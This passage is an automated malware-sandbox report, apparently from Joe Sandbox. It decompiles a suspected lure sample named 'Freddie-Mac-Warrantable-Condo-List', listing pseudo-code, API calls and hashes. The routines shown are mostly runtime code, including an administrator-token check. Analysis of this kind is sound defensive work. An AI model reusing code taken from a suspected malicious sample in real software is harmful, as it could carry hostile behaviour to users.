										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}

0x0042f9b8
0x0042f9b8
0x0042f9b9
0x0042f9bb
0x0042f9bf
0x0042f9c2
0x0042f9c5
0x0042f9c8
0x0042f9cf
0x0042f9dc
0x0042fb6d
0x0042fb73
0x0042fb8a
0x0042fbac
0x0042fbbb
0x0042fbc7
0x0042fbce
0x0042fc88
0x0042fc95
0x0042fd0a
0x0042fd19
0x0042fd25
0x0042fd2c
0x0042fde0
0x00000000
0x0042fd32
0x0042fd3c
0x0042fdd6
0x0042fddb
0x00000000
0x0042fd3e
0x0042fd41
0x0042fd42
0x0042fd49
0x0042fd4a
0x0042fd4f
0x0042fd52
0x0042fd55
0x0042fd5f
0x0042fd6c
0x0042fd6e
0x0042fd6e
0x0042fd92
0x0042fd97
0x0042fd9c
0x0042fd9f
0x0042fda2
0x0042fdaf
0x0042fdaf
0x0042fd3c
0x0042fd0c
0x0042fd0c
0x00000000
0x0042fd0c
0x0042fc97
0x0042fc9a
0x0042fc9b
0x0042fca2
0x0042fca3
0x0042fca8
0x0042fcab
0x0042fcb1
0x0042fcba
0x0042fcc9
0x0042fccb
0x0042fccb
0x0042fcde
0x0042fce3
0x0042fce6
0x0042fce9
0x0042fcf6
0x0042fcf6
0x0042fbd4
0x0042fbde
0x0042fc78
0x0042fc7d
0x00000000
0x0042fbe0
0x0042fbe3
0x0042fbe4
0x0042fbeb
0x0042fbec
0x0042fbf1
0x0042fbf4
0x0042fbf7
0x0042fc01
0x0042fc0e
0x0042fc10
0x0042fc10
0x0042fc34
0x0042fc39
0x0042fc3e
0x0042fc41
0x0042fc44
0x0042fc51
0x0042fc51
0x0042fbde
0x0042fbae
0x0042fbae
0x00000000
0x0042fbae
0x0042fb8c
0x0042fb98
0x00000000
0x0042fb98
0x0042fb75
0x0042fb7e
0x00000000
0x0042fb7e
0x0042f9e2
0x0042f9e5
0x0042f9fc
0x0042fa22
0x0042fa31
0x0042fa3d
0x0042fa44
0x0042fb02
0x0042fb03
0x0042fb0a
0x0042fb0b
0x0042fb10
0x0042fb13
0x0042fb19
0x0042fb22
0x0042fb35
0x0042fb37
0x0042fb37
0x0042fb4a
0x0042fb4f
0x0042fb52
0x0042fb55
0x0042fb62
0x0042fa4a
0x0042fa54
0x0042faf2
0x0042faf7
0x00000000
0x0042fa56
0x0042fa59
0x0042fa5a
0x0042fa61
0x0042fa62
0x0042fa67
0x0042fa6a
0x0042fa6d
0x0042fa77
0x0042fa88
0x0042fa8a
0x0042fa8a
0x0042faae
0x0042fab3
0x0042fab8
0x0042fabb
0x0042fabe
0x0042facb
0x0042facb
0x0042fa54
0x0042fa24
0x0042fa24
0x00000000
0x0042fa24
0x0042f9fe
0x0042fa0a
0x00000000
0x0042fa0a
0x0042f9e7
0x0042f9f0
0x0042fde5
0x0042fded
0x0042fded
0x0042f9e5

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}

0x0041c79d
0x0041c7a0
0x0041c7a2
0x0041c7a6
0x0041c7a7
0x0041c7ac
0x0041c7af
0x0041c7b4
0x0041c7c0
0x0041c7cb
0x0041c7d6
0x0041c7dd
0x0041c7f6
0x0041c7df
0x0041c7e7
0x0041c7e7
0x0041c80a
0x0041c823
0x0041c832
0x0041c838
0x0041c842
0x0041c846
0x0041c84b
0x0041c84b
0x0041c858
0x0041c858
0x0041c838
0x0041c85f
0x0041c862
0x0041c865
0x0041c872

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C

Strings

yyyy, xrefs: 0041C7F1
, xrefs: 0041C7E2

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: $yyyy
API String ID: 3303714858-404527807
Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}

0x0041ef0a
0x0041ef10
0x0041ef13
0x0041ef15
0x0041ef19
0x0041ef1a
0x0041ef1f
0x0041ef22
0x0041ef2f
0x0041ef3e
0x0041ef6e
0x0041ef7a
0x0041ef7f
0x0041ef85
0x0041ef85
0x0041efa7
0x0041efac
0x0041efb1
0x0041efb8
0x0041efc5
0x0041efcf
0x0041efd3
0x0041efda
0x0041efe4
0x0041efe4
0x0041efda
0x0041eff5
0x0041effa
0x0041f009
0x0041f016
0x0041f021
0x0041f027
0x0041f034
0x0041f03a
0x0041f044
0x0041f04a
0x0041f051
0x0041f057
0x0041f05e
0x0041f064
0x0041f080
0x0041f088
0x0041f091
0x0041f094
0x0041f097
0x0041f0a7

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}

0x0040a6d0
0x0040a6d2
0x0040a6d6
0x0040a6e2
0x0040a6ec
0x0040a6ef
0x0040a6f1
0x0040a6f8
0x0040a6fb
0x0040a70c
0x0040a712
0x0040a715
0x0040a718
0x0040a71b
0x0040a721
0x0040a727
0x0040a737
0x0040a737
0x0040a740
0x0040a745
0x0040a749
0x0040a74e
0x0040a753
0x0040a755
0x0040a756
0x0040a75d
0x0040a765
0x0040a76a
0x0040a76a
0x0040a770
0x0040a773
0x0040a773
0x0040a75d
0x0040a77a
0x0040a781
0x0040a781
0x0040a78a
0x0040a794
0x0040a7a2
0x0040a7aa
0x0040a7c7
0x0040a7c7
0x0040a7cf
0x00000000
0x0040a7d7
0x0040a7e1

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7

Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}

0x00420bde
0x00420be3
0x00420be7
0x00420bef
0x00420bf4
0x00420bf4
0x00420c00
0x00420c07
0x00000000
0x00420c07
0x00420c0d

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

Strings

GetDiskFreeSpaceExW, xrefs: 00420BE9
kernel32.dll, xrefs: 00420BD9

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1646373207-1127948838
Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Freddie-Mac-Warrantable-Condo-List.tmp PID: 5344 Parent PID: 3164 Freddie-Mac-Warrantable-Condo-List.tmpCOMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5

Strings

CheckTokenMembership, xrefs: 005C7D4F
advapi32.dll, xrefs: 005C7D54

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2691416632-1888249752
Opcode ID: 78205a2b5bba4b993b19a948a1bb69f4b064863e39af3854e5d28bf474fd5d73
Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
Opcode Fuzzy Hash: 78205a2b5bba4b993b19a948a1bb69f4b064863e39af3854e5d28bf474fd5d73
Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B

Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
